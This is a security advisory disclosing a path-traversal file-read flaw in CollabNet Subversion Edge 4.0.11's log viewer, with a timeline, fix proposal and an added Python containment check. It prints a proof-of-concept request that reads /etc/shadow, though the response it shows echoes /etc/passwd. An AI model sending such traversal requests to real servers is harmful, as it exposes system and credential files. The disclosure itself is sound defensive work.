The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the logfile "fileName" parameter of the show action. Fixed in version 5.0. Version 4.0.11 is affected.
a81a00d4e11ec10f5cba3ea70751d59751a88dc2fb69e74a400c31265fe07b31
# Vuln Title: Local file inclusion in CollabNet Subversion Edge Management
# Frontend via "fileName" parameter of the show action
#
# Date: 10.10.2014
# Author: otr
# Software Link: https://www.open.collab.net/downloads/svnedge
# Vendor: CollabNet
# Version: 4.0.11
# Tested on: Fedora Linux
# Type: Local file inclusion
#
# Risk: Medium
# Status: public/fixed
# Fixed version: 5.0
Timeline:
2014-10-09 Flaw Discovered
2014-10-20 Vendor contacted
2014-10-21 Vendor response
2014-12-08 Vendor fix proposal
2014-12-08 Extension of embargo to 19.4.2015
2015-05-04 Extension of embargo until release of version 5.0
2015-05-18 Release of version 5.0 and public disclosure
Summary:
The CollabNet Subversion Edge Management Frontend allows authenticated admins to
read arbitrary local files via the logfile "fileName" parameter of the show action.
Vulnerability:
Request:
GET /csvn/log/show?fileName=../../../../../../etc/shadow HTTP/1.1
Host: example.com:4434
Response:
HTTP/1.1 200 OK
[...]
<div class="span3">../../../../../../etc/passwd</div>
[...]
root:x:0:0:root:/root:/bin/bash
Fix proposal:
Remove the feature or sanitize the fileName parameter so that path traversal and
arbitrary file inclusion are not possible.
Vendor fix:
[...] now allow only showing hooks/logs within the intended directories.
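
One way to implement the containment check that the fix proposal and the vendor fix describe, as an added example that is not CollabNet's code. Python is used for illustration only; the directory layout, the sample names and the `resolve_log_file` helper are assumptions.

```python
import os
import tempfile
from pathlib import Path


class RejectedPath(ValueError):
    """The requested name does not resolve to a regular file inside the log directory."""


def resolve_log_file(log_dir, file_name):
    """Return the real path for file_name if it lies inside log_dir, else raise."""
    base = Path(log_dir).resolve(strict=True)
    if not file_name or "\x00" in file_name:
        raise RejectedPath("empty name or NUL byte")
    # Joining and then resolving collapses ".." segments and follows symlinks,
    # so the comparison is made on the file that would really be opened.
    # An absolute file_name replaces base in the join and fails the same check.
    candidate = (base / file_name).resolve()
    if os.path.commonpath([str(base), str(candidate)]) != str(base):
        raise RejectedPath("resolves outside the log directory")
    if not candidate.is_file():
        raise RejectedPath("not a regular file")
    return candidate


def demo():
    """Run constructed fileName values against a constructed directory tree."""
    results = []
    with tempfile.TemporaryDirectory() as root:
        logs = Path(root, "data", "logs")          # hypothetical log directory
        logs.mkdir(parents=True)
        (logs / "console.log").write_text("constructed log line\n")
        outside = Path(root, "secret.txt")         # constructed file outside it
        outside.write_text("constructed content\n")
        os.symlink(outside, logs / "link.log")     # symlink escaping the directory
        samples = [("plain", "console.log"), ("dotdot", "../../secret.txt"),
                   ("absolute", str(outside)), ("symlink", "link.log"),
                   ("missing", "missing.log")]
        for label, name in samples:
            try:
                resolve_log_file(logs, name)
                results.append((label, "served"))
            except RejectedPath as exc:
                results.append((label, "rejected: " + str(exc)))
    return results


if __name__ == "__main__":
    for label, outcome in demo():
        print(f"{label:10} {outcome}")
```

The caller should open the returned path rather than the original parameter value, so that the file read is the one that was checked.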